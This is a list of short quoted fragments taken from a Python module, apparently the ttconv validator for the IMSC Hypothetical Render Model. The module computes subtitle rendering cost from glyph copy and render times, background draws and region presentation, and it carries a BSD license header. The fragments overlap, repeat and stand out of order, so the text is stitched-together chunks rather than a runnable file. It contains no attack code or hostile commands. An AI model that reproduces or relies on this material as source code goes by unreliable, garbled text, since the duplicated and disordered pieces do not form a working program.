"int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): return ( f\"{msg} at {float(time_offset):.3f}s (doc",
"= False # Whether the root container had to be cleared dur_t: Number",
"`begin` seconds and ends immediately before the `begin` value of the next ISD.",
"if 0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER def _compute_gcpy(char: str): if len(char)",
"( f\"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\\n\" f\" available time: {float(available_time):.3f}s | HRM time:",
"UTF-8 -*- # Copyright (c) 2021, Pearl TV LLC # # Redistribution and",
"AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE",
"of increasing offset\") stats = hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time = _IPD if doc_index",
"event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index, time_offset, avail_render_time, stats) if",
"IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY",
"int, is_last_isd_empty: bool ): self.isd_stats.is_empty = True draw_area = 0 if index_n ==",
"# should br really be included -> no if isinstance(element, ttconv.model.Br): continue bg_color",
"SUCH DAMAGE. '''Hypothetical Render Model (HRM)''' __author__ = \"<NAME> <<EMAIL>>\" import typing from",
"def info(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg,",
"stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()):",
"''' hrm = HRM() last_offset = 0 is_last_isd_empty = True for doc_index, (time_offset,",
"THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE",
"avail_render_time = _IPD if doc_index == 0 else time_offset - last_offset if stats.dur",
"> 1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index, time_offset, avail_render_time,",
"if isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not None: if",
"return False if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return False",
"False if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return False bg_color:",
"typing.Type[EventHandler]=EventHandler()): '''Determines whether the sequence of ISDs returned by `isd_iterator` conform to the",
"def debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg,",
"use in source and binary forms, with or without # modification, are permitted",
"doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))",
"gren_count: Number = 0 # Total number of glyphs rendered is_empty: bool =",
"if isd is not None: for region in isd.iter_regions(): if not _is_presented_region(region): continue",
"self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d return self.isd_stats def _compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n:",
"\"AS IS\" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED",
"isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ): self.isd_stats.is_empty = True draw_area = 0",
"= 0 for element in region.dfs_iterator(): # should body elements really be excluded?",
"if glyph in front_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif",
"must reproduce the above copyright notice, # this list of conditions and the",
"that occur during processing. Typically overridden by the caller. ''' @staticmethod def _format_message(msg:",
") -> ISDStatistics: self.isd_stats = ISDStatistics() self._compute_dur_t(isd, index_n) self._compute_dur_d(isd, index_n, is_last_isd_empty) self.isd_stats.dur =",
"= draw_area / _BDRAW def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer",
"system: {bg_color.ident}\") if bg_color.components[3] != 0: nbg += 1 draw_area += _region_normalized_size(region) *",
"is_last_isd_empty): last_offset = time_offset is_last_isd_empty = stats.is_empty @dataclass(frozen=True) class _Glyph: char: str color",
"0 # Total number of glyphs copied gren_count: Number = 0 # Total",
"= set() if isd is not None: for region in isd.iter_regions(): if not",
"return True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return False bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor)",
"self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is",
"doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))",
"disclaimer in the documentation # and/or other materials provided with the distribution. #",
"/ _compute_gcpy(char) self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t += nrga /",
"units: {region_extent.height.units}\") return region_extent.width.value * region_extent.height.value / 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region",
"EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. '''Hypothetical Render Model (HRM)'''",
"notice, this # list of conditions and the following disclaimer. # 2. Redistributions",
"#{doc_index})\\n\" f\" available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\\n\" f\" Glyph copy count:",
"0 else time_offset - last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index,",
"dataclass from fractions import Fraction from numbers import Number import logging import ttconv.isd",
"is_last_isd_empty: bool ): self.isd_stats.is_empty = True draw_area = 0 if index_n == 0",
"!= 0: nbg += 1 draw_area += _region_normalized_size(region) * nbg self.isd_stats.nbg_total += nbg",
"element in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text): continue parent = element.parent() nrga =",
"ISDStatistics = None def next_isd( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool )",
"_compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ): self.isd_stats.is_empty = True draw_area",
"a string of length 1\") return _GCPY_BASE if ord(char) in GCPY_12 else _GCPY_OTHER",
"'''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0: return False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none:",
"SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. '''Hypothetical Render Model",
"(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF",
"# 2. Redistributions in binary form must reproduce the above copyright notice, #",
"bool = False # Does the ISD contain any content class EventHandler: '''Allows",
"contain any content class EventHandler: '''Allows a callee to inform the caller of",
"dur: Number = 0 # HRM ISD time dur_d: Number = 0 #",
"ttconv.model from ._gcpy_codepoints import GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE =",
"render count: {stats.gren_count} | Background draw count: {stats.nbg_total} | Clear: {stats.clear}\\n\" ) def",
"0 is_last_isd_empty = True for doc_index, (time_offset, isd) in enumerate(isd_iterator): if time_offset <",
"time_offset is_last_isd_empty = stats.is_empty @dataclass(frozen=True) class _Glyph: char: str color : styles.ColorType font_family:",
"LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def warn(self, msg: str, doc_index: int, time_offset: Fraction,",
"typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ) -> ISDStatistics: self.isd_stats = ISDStatistics() self._compute_dur_t(isd, index_n)",
"root container had to be cleared dur_t: Number = 0 # HRM text",
"be counted? -> NO # should span and br really be included ->",
"else time_offset - last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index, time_offset,",
"span and br really be included -> yes for now # should br",
"0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER def _compute_gcpy(char: str): if len(char) !=",
"RuntimeError(f\"Unsupported extent width units: {region_extent.width.units}\") if region_extent.height.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent",
"index_n: int, is_last_isd_empty: bool ): self.isd_stats.is_empty = True draw_area = 0 if index_n",
"# should span and br really be included -> yes for now #",
"numbers import Number import logging import ttconv.isd import ttconv.style_properties as styles import ttconv.model",
"AND CONTRIBUTORS \"AS IS\" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT",
"OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF",
"str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time,",
"region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is not",
"'''Hypothetical Render Model (HRM)''' __author__ = \"<NAME> <<EMAIL>>\" import typing from dataclasses import",
"+= _region_normalized_size(region) * nbg self.isd_stats.nbg_total += nbg self.isd_stats.dur_d = draw_area / _BDRAW def",
"* font_size.value / 10000 def _compute_ren_g(char: str): if len(char) != 1: raise ValueError(\"Argument",
"{bg_color.ident}\") if bg_color.components[3] != 0: nbg += 1 draw_area += _region_normalized_size(region) * nbg",
"+= nrga / _compute_gcpy(char) self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t +=",
"isd is not None: for region in isd.iter_regions(): if not _is_presented_region(region): continue self.isd_stats.is_empty",
"in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text): continue parent = element.parent() nrga = _compute_nrga(element)",
"in the documentation # and/or other materials provided with the distribution. # #",
"+= 1 front_buffer.add(glyph) self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize)",
"the sequence of ISDs returned by `isd_iterator` conform to the IMSC HRM. `isd_iterator`",
"_BDRAW = 12 _GCPY_BASE = 12 _GCPY_OTHER = 3 _REN_G_CJK = 0.6 _REN_G_OTHER",
"bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] == 0:",
"glyph in front_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif glyph",
"is not styles.ShowBackgroundType.always: return False bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is not",
"nbg = 0 for element in region.dfs_iterator(): # should body elements really be",
"if region.get_style(styles.StyleProperties.Opacity) == 0: return False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False if",
"12 _GCPY_BASE = 12 _GCPY_OTHER = 3 _REN_G_CJK = 0.6 _REN_G_OTHER = 1.2",
"_format_message(msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): return ( f\"{msg}",
"DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;",
"whose active interval starts at `begin` seconds and ends immediately before the `begin`",
"self.isd_stats.dur_d return self.isd_stats def _compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ):",
"drawing time nbg_total: Number = 0 # Number of backgrounds drawn clear: bool",
"before the `begin` value of the next ISD. Errors, warnings and info messages",
"= element.parent() nrga = _compute_nrga(element) for char in element.get_text(): glyph = _Glyph( char=char,",
"nrga = _compute_nrga(element) for char in element.get_text(): glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily),",
"/ 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0: return",
"the above copyright notice, # this list of conditions and the following disclaimer",
"styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] != 0: nbg += 1",
"Pearl TV LLC # # Redistribution and use in source and binary forms,",
"OWNER OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,",
"RuntimeError(\"ISDs are not in order of increasing offset\") stats = hrm.next_isd(isd, doc_index, is_last_isd_empty)",
"def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer = set() if isd",
"= 0.6 _REN_G_OTHER = 1.2 _NGBS = 1 _IPD = 1 @dataclass class",
"{stats.gren_count} | Background draw count: {stats.nbg_total} | Clear: {stats.clear}\\n\" ) def info(self, msg:",
"_compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif glyph in self.back_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char)",
"styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize units: {font_size.units}\") return font_size.value * font_size.value / 10000 def",
"available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def warn(self, msg: str,",
"exceeded\", doc_index, time_offset, avail_render_time, stats) if stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset,",
"must be a string of length 1\") return _REN_G_CJK if 0x4E00 <= ord(char)",
"# HRM background drawing time nbg_total: Number = 0 # Number of backgrounds",
"_is_presented_region(region): continue for element in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text): continue parent =",
"False nbg = 0 for element in region.dfs_iterator(): # should body elements really",
"# -*- coding: UTF-8 -*- # Copyright (c) 2021, Pearl TV LLC #",
"1 @dataclass class ISDStatistics: dur: Number = 0 # HRM ISD time dur_d:",
"styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType class HRM: def __init__(self): self.back_buffer: typing.Set[_Glyph]",
"draw_area / _BDRAW def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer =",
"typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer = set() if isd is not None: for",
"self.back_buffer: typing.Set[_Glyph] = set() self.isd_stats: ISDStatistics = None def next_isd( self, isd: typing.Type[ttconv.isd.ISD],",
"# and/or other materials provided with the distribution. # # THIS SOFTWARE IS",
"OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON",
"= 0 if index_n == 0 or is_last_isd_empty else 1 self.isd_stats.clear = draw_area",
"== 0 else time_offset - last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering time exceeded\",",
"stats)) def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):",
"CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR",
"styles.GenericFontFamilyType]] font_size: styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType",
"ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. '''Hypothetical Render Model (HRM)''' __author__ =",
"front_buffer.add(glyph) self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units",
"exceeded\", doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index, time_offset, avail_render_time, stats) if not",
"DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY",
"document\", doc_index, time_offset, avail_render_time, stats) if not (stats.is_empty and is_last_isd_empty): last_offset = time_offset",
"where `ISD` is an ISD instance whose active interval starts at `begin` seconds",
"def error(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg,",
"Clear: {stats.clear}\\n\" ) def info(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction,",
"IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. '''Hypothetical Render Model (HRM)''' __author__",
"DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED",
"copyright notice, this # list of conditions and the following disclaimer. # 2.",
"import GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE = 12 _GCPY_OTHER =",
"# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE",
"doc_index, (time_offset, isd) in enumerate(isd_iterator): if time_offset < last_offset: raise RuntimeError(\"ISDs are not",
"error(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index,",
"10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0: return False",
"time_offset, available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether the sequence",
"OF SUCH DAMAGE. '''Hypothetical Render Model (HRM)''' __author__ = \"<NAME> <<EMAIL>>\" import typing",
"OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.",
"THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND # ANY EXPRESS OR IMPLIED",
"styles.TextShadowType background_color: styles.ColorType class HRM: def __init__(self): self.back_buffer: typing.Set[_Glyph] = set() self.isd_stats: ISDStatistics",
"offset\") stats = hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time = _IPD if doc_index == 0",
"text_shadow: styles.TextShadowType background_color: styles.ColorType class HRM: def __init__(self): self.back_buffer: typing.Set[_Glyph] = set() self.isd_stats:",
"be included -> no if isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color",
"is styles.DisplayType.none: return False if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always:",
"extent width units: {region_extent.width.units}\") if region_extent.height.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent height",
"A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER",
"in region.dfs_iterator(): # should body elements really be excluded? -> NO # should",
"POSSIBILITY OF SUCH DAMAGE. '''Hypothetical Render Model (HRM)''' __author__ = \"<NAME> <<EMAIL>>\" import",
"typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize",
"region.dfs_iterator(): # should body elements really be excluded? -> NO # should transparent",
"continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not None: if bg_color.ident is not",
"with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS",
"Rendered Glyph Area gcpy_count: Number = 0 # Total number of glyphs copied",
"available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]],",
"time_offset, available_time, stats)) def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction,",
"_IPD if doc_index == 0 else time_offset - last_offset if stats.dur > avail_render_time:",
"or is_last_isd_empty else 1 self.isd_stats.clear = draw_area != 0 if isd is not",
"debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index,",
"styles import ttconv.model from ._gcpy_codepoints import GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW = 12",
"and binary forms, with or without # modification, are permitted provided that the",
"conditions and the following disclaimer in the documentation # and/or other materials provided",
"from dataclasses import dataclass from fractions import Fraction from numbers import Number import",
"font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType class HRM: def",
"1: raise ValueError(\"Argument must be a string of length 1\") return _REN_G_CJK if",
"str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time,",
"HRM text drawing time ngra_t: Number = 0 # Total Normalized Rendered Glyph",
"# 1. Redistributions of source code must retain the above copyright notice, this",
"Total number of glyphs copied gren_count: Number = 0 # Total number of",
"def next_isd( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ) -> ISDStatistics: self.isd_stats",
"disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice,",
"nrga self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t += nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga",
"bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system:",
"time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def validate(isd_iterator:",
"len(char) != 1: raise ValueError(\"Argument must be a string of length 1\") return",
"glyph in self.back_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count +=",
"< last_offset: raise RuntimeError(\"ISDs are not in order of increasing offset\") stats =",
"the IMSC HRM. `isd_iterator` returns a sequence of tuplets `(begin, ISD)`, where `ISD`",
"''' if region.get_style(styles.StyleProperties.Opacity) == 0: return False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False",
"event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether the sequence of ISDs returned by `isd_iterator` conform to",
"index_n, is_last_isd_empty) self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d return self.isd_stats def _compute_dur_d( self, isd:",
"and br really be included -> yes for now # should br really",
"self.isd_stats.ngra_t += nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]):",
"0 # Number of backgrounds drawn clear: bool = False # Whether the",
"Normalized Rendered Glyph Area gcpy_count: Number = 0 # Total number of glyphs",
"def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether the sequence of ISDs returned",
"bg_color is not None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system:",
"styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType class HRM:",
"import Number import logging import ttconv.isd import ttconv.style_properties as styles import ttconv.model from",
"RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] != 0: nbg += 1 draw_area +=",
"python # -*- coding: UTF-8 -*- # Copyright (c) 2021, Pearl TV LLC",
"EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE",
"PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR",
"element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported",
"typing.Set[_Glyph] = set() self.isd_stats: ISDStatistics = None def next_isd( self, isd: typing.Type[ttconv.isd.ISD], index_n:",
"color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph in",
"3 _REN_G_CJK = 0.6 _REN_G_OTHER = 1.2 _NGBS = 1 _IPD = 1",
"of glyphs copied gren_count: Number = 0 # Total number of glyphs rendered",
"= 12 _GCPY_BASE = 12 _GCPY_OTHER = 3 _REN_G_CJK = 0.6 _REN_G_OTHER =",
"time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\\n\" f\" Glyph copy count: {stats.gcpy_count} | render",
"of backgrounds drawn clear: bool = False # Whether the root container had",
"time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def debug(self,",
"# HRM ISD time dur_d: Number = 0 # HRM background drawing time",
"stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether the sequence of ISDs",
"front_buffer = set() if isd is not None: for region in isd.iter_regions(): if",
"= _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) )",
"this # list of conditions and the following disclaimer. # 2. Redistributions in",
"included -> no if isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is",
"must retain the above copyright notice, this # list of conditions and the",
"event_handler.error(\"Rendering time exceeded\", doc_index, time_offset, avail_render_time, stats) if stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\",",
"fontSize units: {font_size.units}\") return font_size.value * font_size.value / 10000 def _compute_ren_g(char: str): if",
"@staticmethod def _format_message(msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): return",
"materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE",
"\"<NAME> <<EMAIL>>\" import typing from dataclasses import dataclass from fractions import Fraction from",
"IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE #",
"_Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if",
"int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def",
"+= nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size:",
"content class EventHandler: '''Allows a callee to inform the caller of events that",
"OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER",
"copied gren_count: Number = 0 # Total number of glyphs rendered is_empty: bool",
"by the caller. ''' @staticmethod def _format_message(msg: str, doc_index: int, time_offset: Fraction, available_time:",
"an ISD instance whose active interval starts at `begin` seconds and ends immediately",
"/ 10000 def _compute_ren_g(char: str): if len(char) != 1: raise ValueError(\"Argument must be",
"_BDRAW def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer = set() if",
"str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time,",
"styles.DisplayType.none: return False if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return",
"region in isd.iter_regions(): if not _is_presented_region(region): continue for element in region.dfs_iterator(): if not",
"br really be included -> no if isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor)",
"# Total number of glyphs copied gren_count: Number = 0 # Total number",
"ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED #",
"had to be cleared dur_t: Number = 0 # HRM text drawing time",
"GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE = 12 _GCPY_OTHER = 3",
"drawing time ngra_t: Number = 0 # Total Normalized Rendered Glyph Area gcpy_count:",
"documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE",
"stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index, time_offset,",
